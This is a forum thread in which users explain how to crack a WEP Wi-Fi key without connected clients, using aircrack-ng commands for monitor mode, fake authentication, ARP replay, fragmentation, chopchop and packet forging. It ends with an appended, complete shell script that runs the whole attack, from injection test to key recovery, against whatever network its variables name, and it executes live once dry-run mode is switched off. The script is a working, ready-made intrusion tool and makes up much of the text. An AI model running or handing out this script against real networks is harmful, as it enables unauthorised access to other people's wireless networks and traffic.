
Thread: Question regarding WEP/WPA cracking

  1. #1
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    11

    Question regarding WEP/WPA cracking

    Here is some background... I have cracked my own WEP key many times, but this specific time it will not work. The problem I'm having is that IVs are not being collected. When I tried last time it only collected 1 IV.

    For the WPA aspect, I guess I'm just looking for a good word list.

  2. #2
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    5


    You need wireless traffic or injection.

  3. #3
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    11


    Well, there were no clients on, so I was going at it clientless.

  4. #4
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    1


    If it's WEP you can crack it, because it doesn't matter if it's clientless...

    Here is how you can do it.... (I'll explain it to you as if you had the same card I have, Atheros [ath5k driver])

    First check if your card is in monitor mode.

    In BT3:
    Code:
    airmon-ng stop ath0
    and again:
    Code:
    airmon-ng start wifi0
    ____
    In BT4 (same deal, different name of the device):
    Code:
    airmon-ng stop wlan1
    Code:
    airmon-ng start wifi0
    _____
    Start your airodump and take note of the BSSID and ESSID, because you'll need them for aireplay-ng..

    Let's say the AP transmits on ch 6 (as if we already know; if not, just run airodump-ng and take a look)

    Code:
    airodump-ng -c 6 wlan1
    Then open a new Konsole - shell - session and run aireplay with the following commands (while doing this, airodump-ng will need to be running)

    aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <your interface's MAC> <your interface>

    [If you don't know what your interface's MAC is, execute this command = macchanger <your interface> -s (-s stands for --show)]

    Code:
    macchanger wlan1 -s
    Then just add your MAC to the aireplay command =D

    Code:
    aireplay-ng -1 0 -e 2wire1231 -a 00:11:22:33:44:55 -h 11:22:33:44:55:66 wlan1
    The -1 stands for the --fakeauth (fake authentication with AP) attack.

    If everything goes well, a message will appear... something like this:

    Code:
    Sending Authentication Request (Open System) [ACK]
    Authentication successful
    Sending Association Request [ACK]
    Association successful :-)
    Then go back to airodump-ng, stop it (Ctrl+C) and just add the option -w <nameofthefile> (write), so the command will end up like this:

    Code:
    airodump-ng -c 6 -w 2123 wlan1
    And now it's going to create a file with the APs... Then start aireplay-ng with the standard ARP-request replay (-3):

    aireplay-ng -3 -b <BSSID> -h <your MAC> <your interface>


    Code:
    aireplay-ng -3 -b 00:11:22:33:44:55 -h 11:22:33:44:55:66 wlan1
    That will start reading the packets; check airodump and you'll see the #Data number going up as if there was a connected client.... Now you only need to wait until 25k and use aircrack.

    That's for WEP; for WPA you need to get a handshake (and I think this is already on the forum, so next time just look first, then ask later).

  5. #5
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Quote Originally Posted by Rifts View Post
    well there were no clients on so i was going it clientless
    In which case you need wireless traffic or injection.

    There are 10,000 tutorials on clientless wep hacking. There are also countless threads about wordlists.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  6. #6
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    19


    Please. Please, start with WEP, as the fundamentals are similar but more gratifying. Nothing helped me more than reading the man pages for the aircrack suite, specifically clientless injection.

    Use one aireplay-ng to fake auth. Then another aireplay-ng to run a chopchop or fragmentation attack. Then, using the data from the attack, packetforge-ng can be used to make an ARP packet. Use that packet for injection with aireplay-ng and voilà, instant IVs.

    Go here and read what you need: hxxp://uuu.aircrack-ng.org/doku.php?id=tutorial (you know the drill, tt the xx's and www the uuu's until I get 15 posts)

    If you look around there long enough you may even find airoscript (beautifully lazy), which does this all for you. Please read and try the tutorials first so you understand what is going on behind the scenes if you find a script.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    11

    yeah

    Quote Originally Posted by BanIvy View Post
    If it's WEP you can crack it, because it doesn't matter if it's clientless...


    Yeah, see, I have done this successfully MANY times, but this specific time my data doesn't go up at all... I don't know what to do to get data packets.

  8. #8
    Senior Member orange's Avatar
    Join Date
    Jan 2010
    Posts
    134


    Yeah, see, I have done this successfully MANY times, but this specific time my data doesn't go up at all... I don't know what to do to get data packets.
    See, what BanIvy described is an ARP request replay attack, and this won't work if there are no clients connected. spasch, in contrast, already provided the right keywords: fragmentation and chopchop.
    Please do some reading by yourself; the aircrack-ng wiki is an excellent resource of information, you just need to actually use it.

  9. #9
    Junior Member SWFu64's Avatar
    Join Date
    Jan 2010
    Posts
    97


    Injection working correctly?
    "I do not know with what weapons World War III will be fought, but World War IV will be fought with sticks and stones."

    Albert Einstein
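The whole clientless sequence that spasch and orange point at (fake auth, then fragmentation or chopchop to recover keystream, packetforge-ng to build an ARP request, interactive replay to make #Data climb), with the injection test SWFu64 asks about as the first step, and BanIvy's ARP-request replay (-3) deliberately left out because it has nothing to replay without a client. This is an added example, not a script posted in the thread or shipped with aircrack-ng. The interface, BSSID, ESSID, channel, MAC and capture prefix are assumed placeholders, the card is assumed to be in monitor mode already, and it only prints the commands unless DRY_RUN=0.

```shell
#!/bin/sh
# Clientless WEP IV generation with the aircrack-ng suite:
#   fake auth -> fragmentation/chopchop -> packetforge-ng -> replay -> aircrack-ng
# Added example, not from the thread. Every value below is an assumed
# placeholder; override via the environment, e.g. WEP_IFACE=mon0 DRY_RUN=0.

WEP_IFACE="${WEP_IFACE:-mon0}"
WEP_BSSID="${WEP_BSSID:-00:11:22:33:44:55}"
WEP_ESSID="${WEP_ESSID:-2wire1231}"
WEP_CHANNEL="${WEP_CHANNEL:-6}"
WEP_OURMAC="${WEP_OURMAC:-11:22:33:44:55:66}"   # must be the injecting card's real MAC
WEP_CAPTURE="${WEP_CAPTURE:-clientless}"        # airodump-ng -w prefix
DRY_RUN="${DRY_RUN:-1}"                         # 1 = print commands, 0 = execute them

# run: print the command in dry-run mode, execute it otherwise.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# The capture must already be writing when injection starts; the thread keeps
# it in a second terminal, so it is backgrounded here.
step_capture() {
    run airodump-ng -c "$WEP_CHANNEL" --bssid "$WEP_BSSID" -w "$WEP_CAPTURE" "$WEP_IFACE" &
}

# Sanity check first: can this card inject at all (aireplay-ng -9)?
step_injection_test() { run aireplay-ng -9 -e "$WEP_ESSID" -a "$WEP_BSSID" "$WEP_IFACE"; }

# Fake authentication (-1): the AP has to accept our MAC before it answers anything.
step_fake_auth() { run aireplay-ng -1 0 -e "$WEP_ESSID" -a "$WEP_BSSID" -h "$WEP_OURMAC" "$WEP_IFACE"; }

# Keystream recovery, the part ARP replay (-3) cannot do without a client:
# fragmentation (-5) writes fragment-*.xor, chopchop (-4) writes replay_dec-*.xor.
step_fragmentation() { run aireplay-ng -5 -b "$WEP_BSSID" -h "$WEP_OURMAC" "$WEP_IFACE"; }
step_chopchop()      { run aireplay-ng -4 -b "$WEP_BSSID" -h "$WEP_OURMAC" "$WEP_IFACE"; }

# Newest keystream file produced by either attack, empty if there is none.
latest_prga() { ls -t fragment-*.xor replay_dec-*.xor 2>/dev/null | head -n 1; }

# Forge a broadcast ARP request encrypted with the recovered keystream ($1).
# The AP re-broadcasts it with a fresh IV every time it is replayed.
step_forge_arp() {
    run packetforge-ng -0 -a "$WEP_BSSID" -h "$WEP_OURMAC" \
        -k 255.255.255.255 -l 255.255.255.255 -y "$1" -w arp-request
}

# Interactive replay (-2) of the forged packet: this is what makes #Data climb.
step_inject() { run aireplay-ng -2 -r arp-request "$WEP_IFACE"; }

# aircrack-ng can run against the capture while it is still growing.
step_crack() { run aircrack-ng -b "$WEP_BSSID" "${WEP_CAPTURE}-01.cap"; }

clientless_wep() {
    step_capture
    step_injection_test
    step_fake_auth
    step_fragmentation || step_chopchop   # fall back to chopchop if -5 exits non-zero
    prga=$(latest_prga)
    if [ -z "$prga" ]; then
        if [ "$DRY_RUN" = "1" ]; then
            prga='fragment-<timestamp>.xor'
        else
            echo "no .xor keystream file found; both -5 and -4 failed" >&2
            return 1
        fi
    fi
    step_forge_arp "$prga"
    step_inject
    step_crack
}

clientless_wep
```

Run it as-is to see the command sequence, then with DRY_RUN=0 once the placeholders are replaced. The -h value has to be the card's real MAC (or what macchanger set it to): the AP's replies go to that address, and if the card is not the one answering, the fake association is dropped and -5/-4 never get a packet to work on. The -3 replay from BanIvy's post only produces IVs once a client has sent a real ARP request; the forged packet from packetforge-ng takes that client's place.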
